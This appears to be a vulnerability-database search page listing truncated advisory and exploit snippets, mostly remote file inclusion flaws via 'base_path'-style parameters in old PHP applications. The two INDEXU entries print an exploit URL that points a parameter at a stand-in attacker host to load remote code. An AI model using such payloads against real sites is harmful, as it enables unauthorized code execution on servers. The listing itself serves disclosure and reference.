60 matches found
Atlassian FishEye/Crucible Cross-Site Scripting Vulnerability
Atlassian FishEye and Crucible are both products of the Australian company Atlassian, FishEye is a suite of software for deep viewing of source code repositories and Crucible is a suite of code review tools. A cross-site scripting vulnerability exists in multiple sources in Atlassian Fisheye and...
CVE-2017-18094
Various resources in Atlassian Fisheye and Crucible before version 4.4.3 the fixed version for 4.4.x and 4.5.0 allow remote attackers with administrative privileges to inject arbitrary HTML or JavaScript via a cross site scripting XSS vulnerability through the base path setting of a configured fi...
CVE-2017-18094
Various resources in Atlassian Fisheye and Crucible before version 4.4.3 the fixed version for 4.4.x and 4.5.0 allow remote attackers with administrative privileges to inject arbitrary HTML or JavaScript via a cross site scripting XSS vulnerability through the base path setting of a configured fi...
Tuleap 9.6 Second-Order PHP Object Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Tuleap 9.6 Second-Order PHP Object Injection', 'Description' = %q This module exploits a Second-Order PHP Object Injection vulnerability in Tulea...
PHPMyBibli 1.32 Init.Inc.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/23599/info PHPMyBibli is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the...
INDEXU <= 5.0.1 (base_path) Remote File Inclusion Exploit
No description provided by source...
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php?base_path Remote File Inclusion
Basic Analysis and Security Engine BASE 1.4.5 - basegraphdisplay.php?basepath Remote File Inclusion source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain...
interact 2.4.1 Multiple Remote File Inclusion Vulnerabilities
Exploit for unknown platform in category web applications ============================================================= interact 2.4.1 Multiple Remote File Inclusion Vulnerabilities ============================================================= -========================================== ViVa Isla...
teatro 1.6 - basePath Remote File Inclusion
teatro 1.6 - basePath Remote File Inclusion teatro 1.6 Remote File Include Vulnerability Download script : http://telemat.die.unifi.it/book/2003/Telematica-II/teatro-1.6.tgz Dicovered by : Alkomandoz Hacker Contact : [email protected]...
PT-2007-3782 · Pixaria · Pixaria Gallery
Name of the Vulnerable Software and Affected Versions: Pixaria Gallery versions prior to 1.4.3 Description: The issue allows remote attackers to execute arbitrary PHP code. This is achieved via a URL in the cfgsysbase path parameter to scripts such as psg.smarty.lib.php and certain include and...
PT-2007-3781 · Pixaria · Pixaria Gallery
Name of the Vulnerable Software and Affected Versions: Pixaria Gallery versions prior to 1.4.3 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the cfgsysbase path parameter in the resources/includes/class.Smarty.php file. Recommendations: For versions pri...
Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability
Pixaria Gallery 1.x class.Smarty.php Remote File Include Vulnerability ----------------------------------------------------------------------------------------- scripts : Pixaria Gallery 1.x Discovered By : irvian scripts site : http://pixaria.com/ Thanks To : hitamputih nyubicrew patihack specia...
Echo Security Advisory 2007.71
\ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV71$2007 --------------------------------------------------------------------------- ECHOADV71$2007 AMP v3.2 basepath Remote File Inclusion Vulnerability...
Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion
Activist Mobilization Platform AMP 3.2 - Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV71$2007 --------------------------------------------------------------------------- ECHOADV71$2007 AMP v3.2 basepath Remote File Inclusion...
Activist Mobilization Platform (AMP) 3.2 Remote File Include Vuln
Exploit for unknown platform in category web applications ================================================================= Activist Mobilization Platform AMP 3.2 Remote File Include Vuln ================================================================= \ /\ \ / | \ \ | / \ // / | \ | \ \ Y /...
MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ================================================================= MODx CMS include $basepath."manager/media/browser/mcpuk/connectors/php/Command...
MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+------------------------------------------------------------------------------------------- + MODx CMS 0.9.2.1 basepath Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Affected Software .: MODx CMS 0.9.2.1 + Vendor...
PT-2006-3356 · Popphoto · Popphoto Studio
Name of the Vulnerable Software and Affected Versions: PopPhoto Studio versions 3.5.4 and earlier Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the include path parameter, specifically through the cfg'popphoto base path' variable in the...
Indexu-5.0.1.txt
Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable: INDEXU = 5.0.1 themepathand basepath Remote File Inclusion Exploit Discovery by SnIpErSA in themepath this file : exploit: http://example.com/indexu/index.php?themepath=http://evil.txt?cmd...
INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit
Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable: INDEXU = 5.0.1 themepathand basepath Remote File Inclusion Exploit Discovery by SnIpErSA in themepath this file : exploit: http://example.com/indexu/index.php?themepath=http://evil.txt?cmd...